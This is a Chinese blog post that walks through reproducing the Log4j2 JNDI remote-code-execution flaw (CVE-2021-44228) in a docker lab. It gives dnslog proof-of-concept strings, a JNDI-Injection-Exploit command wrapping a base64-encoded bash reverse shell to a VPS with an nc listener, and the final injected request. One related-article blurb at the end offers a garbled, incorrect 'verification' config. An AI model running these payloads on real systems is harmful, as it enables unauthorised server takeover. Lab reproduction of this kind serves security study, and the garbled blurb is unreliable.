Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)

最新推荐文章于 2024-04-21 09:40:22 发布
最新推荐文章于 2024-04-21 09:40:22 发布
阅读量790 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: log4j apache
原文链接:https://wzhihui.blog.csdn.net/article/details/122363725?spm=1001.2014.3001.5502
版权

文章目录

漏洞描述

Apache Log4j2是一个基于java的日志记录组件,该日志组件被广泛用于业务系统开发,用以记录程序输入输出日志信息,得益于其他日志的优势:异步日志实现。是最受欢迎的于开发时的日志组件。

2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2 远程代码执行漏洞。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

原理

Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的

POC
c=${jndi:ldap://log4j2.xxxxxx.dnslog.cn}
c=${jndi:rmi://log4j2.xxxxxx.dnslog.cn}

影响范围

Apache Log4j2 2.x <= 2.14.1

Apache Log4j2 2.15.0-rc1(补丁绕过)

漏洞复现(有内鬼,终止交易,看下一个复现)

用到的时github上的vulhub,环境搭建需要配置docker,上网搜或者看我的都可以

搭建完成就出现下面的,然后选择Log4j2中的CVE-2021-44228

在这里插入图片描述
在CVE-2021-44228目录下运行docker-compose uo -d,然后等待pull完成
在这里插入图片描述

不建议docker-compose build,因为下图
在这里插入图片描述
然后访问服务器的ip加8983端口(如果想要换端口,docker-compose uo -d -p 123:8080

漏洞复现

靶场地址
其实这个不用进去(直接拉仓库),不过可以去了解一下

正常操作,按照代码敲就行了,截图就不放了

  1. 拉镜像
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
  1. 运行容器
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
  1. 进入容器并运行
docker exec -it log4j_vuln_container /bin/bash

/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
  1. 访问环境地址加8080端口
    例:
http://192.168.0.148:8080/webstudy/hello-fengxuan

在这里插入图片描述

  1. 测试
    先利用dnslog生成一个用于接收回参的网址(这个工具的作用就是在不知道或者无法查看回显时候利用第三方的平台查看回显,看看自己的命令是否被执行。)
wockre.dnslog.cn

在这里插入图片描述

用burp抓包,然后修改提交方式为POST
在这里插入图片描述

不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
在这里插入图片描述

注意:用burpsuite抓包重放repeter的方式去发poc,有可能在Dnslog上无法回显的情况发送,如果一直重放,在Dnslog上面点Refresh Record都没有反映的话,这个时候就要用到火狐浏览器或者别的浏览器的一个插件,插件名字叫做:Max HackBar。是一个可以用post发包的小插件,原来的HackBar变成付费了,所以换一个免费的Max HackBar,功能一样,所以选择免费的。 这个插件可以在浏览器插件商城里添加,按F12就能看到这个插件。

  1. 命令执行
    要达到命令执行的效果,需要在本地先要生成JNDI链接并启动后端相关服务,这里用的是JNDI-Injection-Exploit v1.0:
    JNDI-Injection-Exploit v1.0 github官网下载,把这个软件上传到vps服务器
    在vps服务器上,进入该工具的目录中,输入以下命令:
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
注意:根据自身情况,调整payload

反弹shell

bash -i >& /dev/tcp/192.168.0.148/9999 0>&1

进行base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNjAuMjQuMTQ4Lzk5OTkgMD4mMQ==

然后就成这样了

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNjAuMjQuMTQ4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.0.148"

在vps上开启监听

nc -lvp 9999

在这里插入图片描述
这里会生成两个协议各一个执行命令,这两个协议在log4j2中都有执行权限

我们使用第一个,再次构造一个payload

rmi://192.168.0.148:1099/wfg8f3

在这里插入图片描述

然后我们将这个payload放到burp里面

http://192.168.0.148:8080/webstudy/hello-fengxuan?action=${jndi:rmi://192.168.0.148:1099/wfg8f3}

在这里插入图片描述
之后获得shell

空白行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4904
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE-2021-44228 Log4j2漏洞复现
Cover-3321的博客
01-07 1790
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
探索Apache Log4j RCE POC:一款强大的安全检测工具
最新发布
gitblog_00066的博客
04-21 438
探索Apache Log4j RCE POC:一款强大的安全检测工具 项目地址:https://gitcode.com/xiajun325/apache-log4j-rce-poc 在网络安全领域,漏洞检测和预防是至关重要的。这个项目——apache-log4j-rce-poc,是一个针对著名Apache Log4j 2.x框架的远程代码执行(RCE漏洞的验证工具。它的目标是帮助开发者、系统管...
漏洞复现Apache log4j RCE 远程代码执行漏洞(CVE-2021-44228)
qq_45244158的博客
12-14 5484
Log4j任意代码执行RCECVE-2021-44228)前言一、漏洞描述二、受影响的版本三、复现过程1.从Vulfocus靶场获取测试环境2.攻击过程四、修复建议1.升级到最新版本2.缓解措施3.流量查询 前言 2021年11月24日,阿里云安全团队正式向Apache报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2的部分功能具有递归分析功能,攻击者可以直接构造恶意请求触发远程代码执行漏洞。 一、漏洞描述 Apache Log4j2 是一个基于 Java 的日志工具。这
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
Boom!脑洞大爆炸的博客
07-07 535
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(四)—漏洞修复原理(2.15.0-RC1、2.15.0、2.16.0)
跳小闹成长记
12-14 3155
本文将和大家一起对Log4j2漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2、Log4j2漏洞在Java高低版本中的不同攻击原理 3、Log4j2漏洞在Java高低版本中的攻击步骤 4、Log4j2漏洞在2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
Apache Log4j2远程代码执行漏洞CVE-2021-44228
Arlo的博客
12-30 1544
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1252
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1321
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
Vector关于Apache Log4Shell CVE-2021-45105,CVE-2021-45046,CVE-2021-44228 的安全漏洞配合与修复全面详解
Polelink北汇信息的博客
12-30 3241
Apache Log4j2 是一个基于 Java 的日志记录开源组件。近日,Log4j2 被爆出现安全漏洞,攻击者可以通过向易受攻击的服务器或应用程序发送操纵请求来利用安全漏洞。Vector 德国PREEvison产品团队已经通过官网和客户管理系统及时通知客户,有关PREEvision中使用的软件组件的严重安全漏洞“Log4Shell”CVE-2021-44228,说明如下:
CVE-2021-44228 Apache log4j 远程命令执行漏洞
mirocky的博客
10-26 1017
log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,从而达到我们应用的需求;由于log4j提供了lookup机制,使日志中的${}也可进行执行,在其中输入JNDI的payload,即可进行执行。此处必须复制无版本号的rmi,否则不会成功,理由未知。使用开源的dnslog:ceye.io。
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程
weixin_46622976的博客
12-13 6991
首先我们要理解漏洞产生的原因,存在漏洞的机器为LDAP客户端,我们构造payload地址为自己的LDAP服务端,自己服务端会去HTTP服务器加载恶意文件。(验证的话,payload直接为DNS服务器即可) 以github上项目为例:GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行 一、编译exp,并放置在HTTP服务器,等待LDAP服务器来下载 git clone https://gith...
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4262
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值